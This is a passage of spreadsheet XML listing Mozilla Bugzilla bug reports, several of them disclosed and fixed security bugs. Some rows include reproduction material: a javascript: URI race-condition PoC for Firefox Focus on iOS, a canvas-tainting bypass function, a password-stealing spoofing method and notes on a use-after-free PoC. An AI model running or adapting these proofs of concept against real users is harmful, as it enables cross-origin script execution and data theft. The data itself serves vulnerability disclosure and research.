          <t>[adv-main21+][adv-esr1706+]</t>
        </is>
      </c>
      <c r="Q5274" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5274" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5274" t="inlineStr">
        <is>
          <t>mozilla23</t>
        </is>
      </c>
      <c r="T5274" t="n">
        <v>1</v>
      </c>
      <c r="U5274" t="n">
        <v>0</v>
      </c>
      <c r="V5274" t="n">
        <v>25</v>
      </c>
      <c r="W5274" t="inlineStr">
        <is>
          <t>Created attachment 743178
Test
Noticed while reviewing bug 866679. Attached test shows that we return garbage to JS.</t>
        </is>
      </c>
      <c r="X5274" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5275">
      <c r="A5275" t="n">
        <v>1855575</v>
      </c>
      <c r="B5275" t="inlineStr">
        <is>
          <t>2023-09-27 16:21:41 -0700</t>
        </is>
      </c>
      <c r="C5275" t="inlineStr">
        <is>
          <t>iOS Firefox Focus let javascript: URI to run on Top Origin sites</t>
        </is>
      </c>
      <c r="D5275" t="inlineStr">
        <is>
          <t>2024-09-16 00:12:20 -0700</t>
        </is>
      </c>
      <c r="E5275" t="n">
        <v>1</v>
      </c>
      <c r="F5275" t="n">
        <v>1</v>
      </c>
      <c r="G5275" t="n">
        <v>2</v>
      </c>
      <c r="H5275" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5275" t="inlineStr">
        <is>
          <t>Focus</t>
        </is>
      </c>
      <c r="J5275" t="inlineStr">
        <is>
          <t>Security: iOS</t>
        </is>
      </c>
      <c r="K5275" t="inlineStr">
        <is>
          <t>Firefox 122</t>
        </is>
      </c>
      <c r="L5275" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5275" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5275" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5275" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5275" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?]</t>
        </is>
      </c>
      <c r="Q5275" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5275" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S5275" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5275" t="n">
        <v>1</v>
      </c>
      <c r="U5275" t="n">
        <v>0</v>
      </c>
      <c r="V5275" t="n">
        <v>46</v>
      </c>
      <c r="W5275" t="inlineStr">
        <is>
          <t>Created attachment 9355440
Focus_jsuritop.mp4
We are able to run javascript: URI on Top Origin sites using race condition attack with setTimeout().
I used https://facebook.com as an example demo for this test case.
PoC demo: https://pwning.click/jsuritop.php
```HTML
&lt;script&gt;
function a(){
	window.open('https://facebook.com', 'x');
	setTimeout(function(){
		window.open('javascript:document.write(document.domain)');
	}, 555);
}
&lt;/script&gt; 
&lt;center&gt;&lt;img src="https://pwning.click/Genius_Cat.jpg" onclick="a()"&gt;&lt;/center&gt;
```</t>
        </is>
      </c>
      <c r="X5275" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5276">
      <c r="A5276" t="n">
        <v>687745</v>
      </c>
      <c r="B5276" t="inlineStr">
        <is>
          <t>2011-09-19 18:26:11 -0700</t>
        </is>
      </c>
      <c r="C5276" t="inlineStr">
        <is>
          <t>(CVE-2012-0474) URL &amp; SSL/TLS Spoofing and saved password stealing using multiple history.back() and history.forward()</t>
        </is>
      </c>
      <c r="D5276" t="inlineStr">
        <is>
          <t>2024-05-29 15:56:34 -0700</t>
        </is>
      </c>
      <c r="E5276" t="n">
        <v>1</v>
      </c>
      <c r="F5276" t="n">
        <v>1</v>
      </c>
      <c r="G5276" t="n">
        <v>3</v>
      </c>
      <c r="H5276" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5276" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5276" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K5276" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5276" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5276" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N5276" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5276" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5276" t="inlineStr">
        <is>
          <t>[sg:high][qa!] fixed by bug 737307</t>
        </is>
      </c>
      <c r="Q5276" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5276" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5276" t="inlineStr">
        <is>
          <t>mozilla14</t>
        </is>
      </c>
      <c r="T5276" t="n">
        <v>1</v>
      </c>
      <c r="U5276" t="n">
        <v>0</v>
      </c>
      <c r="V5276" t="n">
        <v>53</v>
      </c>
      <c r="W5276" t="inlineStr">
        <is>
          <t>Created attachment 561093
ScreenShot.png
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0.2) Gecko/20100101 Firefox/6.0.2
Build ID: 20110902133214
Steps to reproduce:
The problem originated is from the creation of a link with javascript (window.open ; document.location ; back() ; forward() ; fragment navigation and Redirect.) . When you open a new tab via window.open on another address (with SSL or not) and use all of this elements,  it's possible to spoof the URL and SSL/TLS.
It's also possible to steal saved password on Mozilla firefox if the web page spoofed contains a form with saved password. the form should be like : &lt;form ACTION="/connect.php"&gt; but not like this : &lt;form ACTION="HTTP://www.xxx.yyy/connect.php"&gt; for steal the saved password and login (I have chosen linkedin.com for demonstrate this).
This blank page can be changed with javascript with making a spoofing attak.
Actual results:
URL with SSL/TLS is Spoofed and we can steal saved password of linkedin.com (and many other website with a connection formulary's like linkedin.com)
/!\ I had found a very similare vulnerability on Google chrome in the past (same impact =&gt; SecSeverity:high)</t>
        </is>
      </c>
      <c r="X5276" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5277">
      <c r="A5277" t="n">
        <v>499512</v>
      </c>
      <c r="B5277" t="inlineStr">
        <is>
          <t>2009-06-20 15:32:02 -0700</t>
        </is>
      </c>
      <c r="C5277" t="inlineStr">
        <is>
          <t>Crash in OGG : res2_inverse at vorbis_res0.c:849</t>
        </is>
      </c>
      <c r="D5277" t="inlineStr">
        <is>
          <t>2010-01-08 11:37:26 -0800</t>
        </is>
      </c>
      <c r="E5277" t="n">
        <v>1</v>
      </c>
      <c r="F5277" t="n">
        <v>1</v>
      </c>
      <c r="G5277" t="n">
        <v>3</v>
      </c>
      <c r="H5277" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5277" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5277" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K5277" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5277" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5277" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5277" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5277" t="inlineStr">
        <is>
          <t>WORKSFORME</t>
        </is>
      </c>
      <c r="P5277" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q5277" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5277" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5277" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5277" t="n">
        <v>1</v>
      </c>
      <c r="U5277" t="n">
        <v>0</v>
      </c>
      <c r="V5277" t="n">
        <v>20</v>
      </c>
      <c r="W5277" t="inlineStr">
        <is>
          <t>Program received signal:  “EXC_ARITHMETIC”, looks like a div by zero.
#0	0x1358cb59 in res2_inverse at vorbis_res0.c:849
#1	0x1358e972 in mapping0_inverse at vorbis_mapping0.c:783
#2	0x13582af6 in vorbis_synthesis at vorbis_synthesis.c:81
#3	0x1354fddc in fs_vorbis_decode at fishsound_vorbis.c:158
#4	0x1354f122 in fish_sound_decode at fishsound_decode.c:117
#5	0x13554aff in oggplay_callback_audio at oggplay_callback.c:391
#6	0x1356204e in oggz_read_sync at oggz_read.c:483
#7	0x135623af in oggz_read at oggz_read.c:587
#8	0x13553b95 in oggplay_step_decoding at oggplay.c:691
#9	0x13540fec in nsOggDecodeStateMachine::DecodeFrame at nsOggDecoder.cpp:732
#10	0x13546683 in nsOggDecodeStateMachine::Run at nsOggDecoder.cpp:1428
#11	0x005759e4 in nsThread::ProcessNextEvent at nsThread.cpp:510
#12	0x004fe968 in NS_ProcessNextEvent_P at nsThreadUtils.cpp:227
#13	0x00575bf3 in nsThread::ThreadFunc at nsThread.cpp:254
#14	0x00728465 in _pt_root at ptthread.c:228
#15	0x96291155 in _pthread_start
#16	0x96291012 in thread_start</t>
        </is>
      </c>
      <c r="X5277" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5278">
      <c r="A5278" t="n">
        <v>1833876</v>
      </c>
      <c r="B5278" t="inlineStr">
        <is>
          <t>2023-05-18 07:22:56 -0700</t>
        </is>
      </c>
      <c r="C5278" t="inlineStr">
        <is>
          <t>Manipulation with Offscreen Canvas allows bypassing tainting restrictions</t>
        </is>
      </c>
      <c r="D5278" t="inlineStr">
        <is>
          <t>2024-06-02 11:57:17 -0700</t>
        </is>
      </c>
      <c r="E5278" t="n">
        <v>1</v>
      </c>
      <c r="F5278" t="n">
        <v>1</v>
      </c>
      <c r="G5278" t="n">
        <v>3</v>
      </c>
      <c r="H5278" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5278" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5278" t="inlineStr">
        <is>
          <t>Graphics: Canvas2D</t>
        </is>
      </c>
      <c r="K5278" t="inlineStr">
        <is>
          <t>Firefox 114</t>
        </is>
      </c>
      <c r="L5278" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5278" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5278" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5278" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5278" t="inlineStr">
        <is>
          <t>[adv-main116+][adv-ESR102.14+][adv-ESR115.1+]</t>
        </is>
      </c>
      <c r="Q5278" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5278" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S5278" t="inlineStr">
        <is>
          <t>117 Branch</t>
        </is>
      </c>
      <c r="T5278" t="n">
        <v>1</v>
      </c>
      <c r="U5278" t="n">
        <v>0</v>
      </c>
      <c r="V5278" t="n">
        <v>36</v>
      </c>
      <c r="W5278" t="inlineStr">
        <is>
          <t>Created attachment 9334823
The working demos of the Canvas restriction bypassing
The attached demo (A modified example from the demo page https://developer.mozilla.org/en-US/docs/Web/API/Canvas_API/Tutorial/Pixel_manipulation_with_canvas ) tries to overcome the restriction that doesn't allow accessing the canvas pixel data when a locally accessed image was drawn on it.
Steps to reproduce:
 *  Extract the archive locally (Windows 7 in my case). 
 *  Open file .... main_entry\UntaintingFFDemo.htm
 *  Click at Grayscale/Invated/Sepia. 
What happened:
* the switching works without limitations in Firefox showing the modified images. So the pixels of the image from the local exposed_image folder is accessed by the script.
What expected
 *  no change in canvas, possible security-related errors in the console related to the security restrictions. 
I thought that it was a feature, not a bug, but In Chrome ( Version 109.0.5414.120 (Official Build) (64-bit) ) they are not drawn with the console error
&gt; Uncaught DOMException: Failed to execute 'getImageData' on 'OffscreenCanvasRenderingContext2D': The canvas has been tainted by cross-origin data. ...   at GetUnrestrictedImageData
The code fragment that "launders" the image is this 
```
function GetUnrestrictedImageData(restrImage)
{
  var img = new Image(restrImage.width, restrImage.height);
  var offscreen = new OffscreenCanvas(restrImage.width, restrImage.height);
  var gctx = offscreen.getContext("2d");
  gctx.drawImage(restrImage, 0, 0);
  var testImageData = gctx.getImageData(0, 0, offscreen.width, offscreen.height);
  return testImageData;
}
```</t>
        </is>
      </c>
      <c r="X5278" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5279">
      <c r="A5279" t="n">
        <v>369696</v>
      </c>
      <c r="B5279" t="inlineStr">
        <is>
          <t>2007-02-07 23:09:25 -0800</t>
        </is>
      </c>
      <c r="C5279" t="inlineStr">
        <is>
          <t>"Assertion failure: map-&gt;depth &gt; 0" in js_LeaveSharpObject</t>
        </is>
      </c>
      <c r="D5279" t="inlineStr">
        <is>
          <t>2012-04-09 11:17:23 -0700</t>
        </is>
      </c>
      <c r="E5279" t="n">
        <v>1</v>
      </c>
      <c r="F5279" t="n">
        <v>1</v>
      </c>
      <c r="G5279" t="n">
        <v>3</v>
      </c>
      <c r="H5279" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5279" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5279" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5279" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5279" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5279" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5279" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5279" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5279" t="inlineStr">
        <is>
          <t>[sg:critical?] fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q5279" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5279" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5279" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5279" t="n">
        <v>1</v>
      </c>
      <c r="U5279" t="n">
        <v>0</v>
      </c>
      <c r="V5279" t="n">
        <v>45</v>
      </c>
      <c r="W5279" t="inlineStr">
        <is>
          <t>Pasting the following into the js shell causes an assertion failure.
q = [];
q.__defineGetter__("0", q.toString);
q[2] = q;
q.toSource();
In opt, I get "InternalError: too much recursion" instead.</t>
        </is>
      </c>
      <c r="X5279" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5280">
      <c r="A5280" t="n">
        <v>852772</v>
      </c>
      <c r="B5280" t="inlineStr">
        <is>
          <t>2013-03-19 16:53:37 -0700</t>
        </is>
      </c>
      <c r="C5280" t="inlineStr">
        <is>
          <t>[stage] Data on stage appears to be stale (but it's not)</t>
        </is>
      </c>
      <c r="D5280" t="inlineStr">
        <is>
          <t>2013-03-21 10:01:33 -0700</t>
        </is>
      </c>
      <c r="E5280" t="n">
        <v>1</v>
      </c>
      <c r="F5280" t="n">
        <v>1</v>
      </c>
      <c r="G5280" t="n">
        <v>4</v>
      </c>
      <c r="H5280" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5280" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J5280" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K5280" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5280" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5280" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5280" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5280" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5280" t="inlineStr">
        <is>
          <t>[fromAutomation][stage]</t>
        </is>
      </c>
      <c r="Q5280" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5280" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S5280" t="inlineStr">
        <is>
          <t>39</t>
        </is>
      </c>
      <c r="T5280" t="n">
        <v>1</v>
      </c>
      <c r="U5280" t="n">
        <v>0</v>
      </c>
      <c r="V5280" t="n">
        <v>11</v>
      </c>
      <c r="W5280" t="inlineStr">
        <is>
          <t>I'm having difficulty populating the reports with data for duration=7. mpressman checked and the we should have data on stage, max(date) is 2013-03-18.
- https://crash-stats.allizom.org/products/Firefox#duration=14</t>
        </is>
      </c>
      <c r="X5280" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5281">
      <c r="A5281" t="n">
        <v>473821</v>
      </c>
      <c r="B5281" t="inlineStr">
        <is>
          <t>2009-01-15 13:32:12 -0800</t>
        </is>
      </c>
      <c r="C5281" t="inlineStr">
        <is>
          <t>create new tp pageset that is newer and smaller</t>
        </is>
      </c>
      <c r="D5281" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E5281" t="n">
        <v>1</v>
      </c>
      <c r="F5281" t="n">
        <v>1</v>
      </c>
      <c r="G5281" t="n">
        <v>5</v>
      </c>
      <c r="H5281" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5281" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5281" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5281" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5281" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5281" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5281" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5281" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5281" t="inlineStr"/>
      <c r="Q5281" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5281" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5281" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5281" t="n">
        <v>1</v>
      </c>
      <c r="U5281" t="n">
        <v>0</v>
      </c>
      <c r="V5281" t="n">
        <v>43</v>
      </c>
      <c r="W5281" t="inlineStr">
        <is>
          <t>Replace the currently used Tp3 pageset with one based upon the current alexa top 500, also attempt to get under 100 pages to decrease the cycle time of talos boxes without reducing the trustworthiness of the data collected.</t>
        </is>
      </c>
      <c r="X5281" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5282">
      <c r="A5282" t="n">
        <v>703983</v>
      </c>
      <c r="B5282" t="inlineStr">
        <is>
          <t>2011-11-20 07:09:20 -0800</t>
        </is>
      </c>
      <c r="C5282" t="inlineStr">
        <is>
          <t>CSRF vulnerability in attachment.cgi allows possible unauthorized attachment creation</t>
        </is>
      </c>
      <c r="D5282" t="inlineStr">
        <is>
          <t>2024-05-29 15:56:57 -0700</t>
        </is>
      </c>
      <c r="E5282" t="n">
        <v>1</v>
      </c>
      <c r="F5282" t="n">
        <v>1</v>
      </c>
      <c r="G5282" t="n">
        <v>4</v>
      </c>
      <c r="H5282" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5282" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5282" t="inlineStr">
        <is>
          <t>Attachments &amp; Requests</t>
        </is>
      </c>
      <c r="K5282" t="inlineStr">
        <is>
          <t>2.10</t>
        </is>
      </c>
      <c r="L5282" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5282" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5282" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5282" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5282" t="inlineStr">
        <is>
          <t>[infrasec:csrf][ws:moderate]</t>
        </is>
      </c>
      <c r="Q5282" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5282" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5282" t="inlineStr">
        <is>
          <t>Bugzilla 4.2</t>
        </is>
      </c>
      <c r="T5282" t="n">
        <v>1</v>
      </c>
      <c r="U5282" t="n">
        <v>0</v>
      </c>
      <c r="V5282" t="n">
        <v>37</v>
      </c>
      <c r="W5282" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.121 Safari/535.2
Steps to reproduce:
Hi,
all tests done in https://landfill.bugzilla.org/bugzilla-tip/show_bug.cgi?id=16552.
A vulnerability exists in the upload page bugzilla when a request is made and the value of "token" is not sent to the Bugzilla server, an error occurs allowing XSRF attacker to induce a victim to upload a file in a bug reported, without him knowing.
Actual results:
Upload the file
Expected results:
The file is upload</t>
        </is>
      </c>
      <c r="X5282" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5283">
      <c r="A5283" t="n">
        <v>28456</v>
      </c>
      <c r="B5283" t="inlineStr">
        <is>
          <t>2000-02-18 15:13:39 -0800</t>
        </is>
      </c>
      <c r="C5283" t="inlineStr">
        <is>
          <t>Removing bullets on a bulleted list of more than one deletes text</t>
        </is>
      </c>
      <c r="D5283" t="inlineStr">
        <is>
          <t>2001-09-12 00:43:03 -0700</t>
        </is>
      </c>
      <c r="E5283" t="n">
        <v>1</v>
      </c>
      <c r="F5283" t="n">
        <v>1</v>
      </c>
      <c r="G5283" t="n">
        <v>3</v>
      </c>
      <c r="H5283" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5283" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5283" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K5283" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5283" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5283" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N5283" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5283" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5283" t="inlineStr">
        <is>
          <t>will verify after 38991 gets fixed.</t>
        </is>
      </c>
      <c r="Q5283" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5283" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5283" t="inlineStr">
        <is>
          <t>M16</t>
        </is>
      </c>
      <c r="T5283" t="n">
        <v>1</v>
      </c>
      <c r="U5283" t="n">
        <v>0</v>
      </c>
      <c r="V5283" t="n">
        <v>19</v>
      </c>
      <c r="W5283" t="inlineStr">
        <is>
          <t>Steps:
1) Launch Composer
2) Create three rows of lines with text
abc
abcd
abcde
3) Highlight the three rows and click the bullet icon
4) Unhighlight the selection and click on one of the rows
5) Highlight the 3 bullets and hit the bullet icon again
Actual Results: Either list is completely unformatted or you lose lines of text
Expected results: Bullets removed and you are back to having 3 lines of text
Build Date/Platform: 2/16/00-15 on NT</t>
        </is>
      </c>
      <c r="X5283" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5284">
      <c r="A5284" t="n">
        <v>1246093</v>
      </c>
      <c r="B5284" t="inlineStr">
        <is>
          <t>2016-02-05 00:27:20 -0800</t>
        </is>
      </c>
      <c r="C5284" t="inlineStr">
        <is>
          <t>Several security patches for the graphite library are not backported to firefox esr 38</t>
        </is>
      </c>
      <c r="D5284" t="inlineStr">
        <is>
          <t>2024-05-30 09:09:08 -0700</t>
        </is>
      </c>
      <c r="E5284" t="n">
        <v>1</v>
      </c>
      <c r="F5284" t="n">
        <v>1</v>
      </c>
      <c r="G5284" t="n">
        <v>3</v>
      </c>
      <c r="H5284" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5284" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5284" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K5284" t="inlineStr">
        <is>
          <t>38 Branch</t>
        </is>
      </c>
      <c r="L5284" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5284" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5284" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5284" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5284" t="inlineStr"/>
      <c r="Q5284" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5284" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5284" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5284" t="n">
        <v>1</v>
      </c>
      <c r="U5284" t="n">
        <v>0</v>
      </c>
      <c r="V5284" t="n">
        <v>12</v>
      </c>
      <c r="W5284" t="inlineStr">
        <is>
          <t>Created attachment 8716213
poc.zip
For example a slightly different version of Bug 1223002 (wrong processing of cntxt_item interstructions) which is fixed in autumn 15 is still exploitable in ff esr 38.6.
I think despite ff esr 38 is near eol this is interesting because some bugs of this kind are really powerful.
For example my poc spawns a calc.exe in the current ff esr 38.6 with win32 bit (full aslr+dep bypass).</t>
        </is>
      </c>
      <c r="X5284" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5285">
      <c r="A5285" t="n">
        <v>1854076</v>
      </c>
      <c r="B5285" t="inlineStr">
        <is>
          <t>2023-09-20 01:26:37 -0700</t>
        </is>
      </c>
      <c r="C5285" t="inlineStr">
        <is>
          <t>heap-use-after-free messagechannel/MessagePort.cpp:574 in mozilla::dom::MessagePort::Entangled</t>
        </is>
      </c>
      <c r="D5285" t="inlineStr">
        <is>
          <t>2024-05-30 11:14:23 -0700</t>
        </is>
      </c>
      <c r="E5285" t="n">
        <v>1</v>
      </c>
      <c r="F5285" t="n">
        <v>1</v>
      </c>
      <c r="G5285" t="n">
        <v>3</v>
      </c>
      <c r="H5285" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5285" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5285" t="inlineStr">
        <is>
          <t>DOM: postMessage</t>
        </is>
      </c>
      <c r="K5285" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5285" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5285" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5285" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5285" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5285" t="inlineStr">
        <is>
          <t>[adv-main120+][adv-esr115.5+][reporter-external] [client-bounty-form] [verif?][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q5285" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5285" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S5285" t="inlineStr">
        <is>
          <t>121 Branch</t>
        </is>
      </c>
      <c r="T5285" t="n">
        <v>1</v>
      </c>
      <c r="U5285" t="n">
        <v>0</v>
      </c>
      <c r="V5285" t="n">
        <v>30</v>
      </c>
      <c r="W5285" t="inlineStr">
        <is>
          <t>Created attachment 9354066
poc.zip
#Summary
heap-use-after-free messagechannel/MessagePort.cpp:574 in mozilla::dom::MessagePort::Entangled
#Reproduce
OS:Win10 X64
119.0a1 (2023-09-20) (64-bit)
step:
1. python -m http.server 1337
2. python -m ffpuppet firefox.exe -p prefs.js -d -u http://localhost:1337/poc_heavy_but_stable.html
NOTE!
poc_heavy_but_stable.html (Samples before minimization can reproduce the issue stably)
poc_mini_not_stable.html (Minimizing the sample may be helpful for analysis, but it cannot be stably reproduced)
#Type of crash
Tab process
#Analysis
MessagePortChild uses mPort to hold the original pointer of MessagePort. 
The comment explains that it is because "this child is owned by this MessagePort", but this comment seems incorrect.
Searching the code found that MessagePortChild was created at [2] and assigned to MessagePort at [3].
```
class MessagePortChild final : public PMessagePortChild {
  friend class PMessagePortChild;
 public:
  NS_INLINE_DECL_REFCOUNTING(MessagePortChild)
  MessagePortChild();
  void SetPort(MessagePort* aPort) { mPort = aPort; }
---CUT---
  // This is a raw pointer because this child is owned by this MessagePort.
  MessagePort* mPort;
};
```
[2]
https://searchfox.org/mozilla-central/source/ipc/glue/BackgroundChildImpl.cpp#441
RefPtr&lt;dom::MessagePortChild&gt; agent = new dom::MessagePortChild(); // found in mozilla::ipc::BackgroundChildImpl::AllocPMessagePortChild
[3]
https://searchfox.org/mozilla-central/source/dom/messagechannel/MessagePort.cpp#794
mActor = static_cast&lt;MessagePortChild*&gt;(actor); // found in mozilla::dom::MessagePort::ConnectToPBackground
#FIX Suggestion
If the above analysis is correct,RefPtr  can be used to resolve the issue.</t>
        </is>
      </c>
      <c r="X5285" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5286">
